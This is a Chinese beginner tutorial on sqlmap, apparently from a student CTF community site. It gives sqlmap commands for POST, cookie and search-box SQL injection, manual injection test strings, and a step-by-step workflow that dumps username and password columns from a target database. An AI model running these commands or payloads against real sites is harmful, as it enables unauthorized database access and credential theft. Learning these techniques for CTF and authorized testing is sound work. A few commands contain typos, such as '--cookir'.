您的足迹:首页 > Web安全 >(原创)sqlmap注入初级教程[sqlmap][sqlmap指令][sqlmap怎么用]
  • 社团XSS平台 xss.klmyssn.com
  • 全国青少年信息技术社团联盟 lm.klmyssn.com
  • 全国中学生CTF论坛 bbs.klmyssn.com
  • 全国中学生CTF平台 ctf.klmyssn.com
  • (原创)sqlmap注入初级教程[sqlmap][sqlmap指令][sqlmap怎么用]

    熟悉sqlmap之路

    SqlmapPost注入

    方法一:sqlmap.py -r test.txt -p “抓包到的post数据里面的其中一个post参数” --dbs  

    解释意思/*sqlamp进行post注入并且假如存在注入就返回数据库的信息,test.txt文档就是对网页抓到的包全选数据包内容然后保存为test.txt文件,直接-r test.txt是把文档放在与sqlmap同一目录下的才行。-p是指定参数注入,更精准*/

    假如不是放在与sqlmap同一目录下的话,那么就是sqlmap.py -r D:\test.txt -p 抓包到的post数据里面的其中一个post参数” --dbs

     

    方法二:sqlmap.py -u “存在注入的url,一般多用于后台” --data=”抓到的post包的最后一行的内容” -p “指定post包里面的某一个参数

     

    方法三:

    假设有个网站,url地址为:https://www.127.0.0.1/base64?id=10

    假如想测试这个页面是否有post注入

    用这个方式:sqlmap.py -u “https://www.127.0.0.1/base64” --data=”id=10” -f --banner --dbs   

     

     

    方法四:自动注入方法

    sqlmap.py -u “http://xxxxxx.com(cn/net/org)/login.asp(php,aspx,jsp等程序格式)” --forms       一般用于后台注入。

     

     

    Sqlmapcookie注入

    方法一:

    假设有个网站,url地址为:https://www.127.0.0.1/base32?id=45

    假如想测试这个页面是否有cookie注入

    采用的注入方式如下:sqlmap.py -u “https://www.127.0.0.1/base32” --data=”id=10” --dbs --level 2

       对方法一的解释/*level 2是探测等级的意思,这里采用注入选择探测等级为2,当探测等级为22以上sqlmap是会尝试注入cookie参数的*/

      

    方法二:sqlmap.py -u “存在注入url” --cookie=”抓包抓到的cookie” 

    或者是这样使用:sqlmap.py -u “存在注入url” --cookir=”抓包抓到的cookie” --level 2    //前面讲过了探测等级为2就注入cookie参数的

     

     

     

    Sqlmap之搜索框注入

      搜索框注入感觉和post注入简直一模一样,只不过形式是注入搜索框而不是usernamepassword

    方法一:sqlmap.py -u “http://xxxxxx.com/search.php(asp,aspx,jsp)” --data=”抓包到的搜索框的信息” -p “指定搜索框里面的一个参数值”

       我在补天提交过一个搜索框注入,如图所示:

     点击查看原图

     

    搜索框注入手工判断:

     

    ' and 1=1 and '%'=' 返回所以结果
    ' and 1=2 and '%'=' 无返回结果
    ' and exists (select * from sysobjects) and '%'=' 返回正常   //最后一个针对于mssql数据库


    百度了下:

    点击查看原图

     

    系统对象表,针对于sql server(Mssql)数据库

     

     

     

    一次sqlmap注入某注入点并且dump出账号密码全程

    判断注入点:sqlmap.py -u “存在注入url”

    爆出所有数据库名字:sqlmap.py -u “存在注入url” --dbs

    查看当前使用账号:sqlmap.py -u “存在注入url” --current-user

    //**的是关键看我下面的四步走

    1**查看当前数据库:sqlmap.py -u 存在注入url” --current-db

     

    2、**列出数据库中所有表:sqlmap.py -u 存在注入url” --tables,除了这样也可以这样整,如下所示:sqlmap.py -u 存在注入url” -D “当前数据库名” --tables   //解释说明:-D是指定数据库名称。

     

    3**-T是指定列要出字段的表,就是数据库中的表名。

    列出数据库中的表中的字段:sqlmap.py -u “存在注入url” -D “当前数据库名” -T “数据库中的随意一张表(选取表需要自己判断)” --columns

     

    4**跑出来表中的字段然后暴力拆解账号和密码,一般字段账号密码都是user/pass/password/username/keyword这些等等,自己找敏感的字段然后进行拆解。

    -C指定要暴力拆解的字段

    暴力拆解账号密码:sqlmap.py -u “存在注入url ” -D “当前数据库名” -T “数据库中的随意一张表(选取表需要自己判断)” -C “username,password,email(columns(字段)中疑似网站账号密码邮箱等敏感字段,举例子说明)” --dump

     --dump将结果导出。

     

    四步走有异曲同工之处,不管是什么方式的注入他们的方法都不会变。

    相关推荐

  • 社团XSS平台 xss.klmyssn.com
  • 全国青少年信息技术社团联盟 lm.klmyssn.com
  • 全国中学生CTF论坛 bbs.klmyssn.com
  • 全国中学生CTF平台 ctf.klmyssn.com
  • 社团群号 487202411 广告位招租~

    发表评论

    路人甲 表情
    Ctrl+Enter快速提交

    网友评论(1)

    可以
    ssn 3年前 (2017-02-18) 回复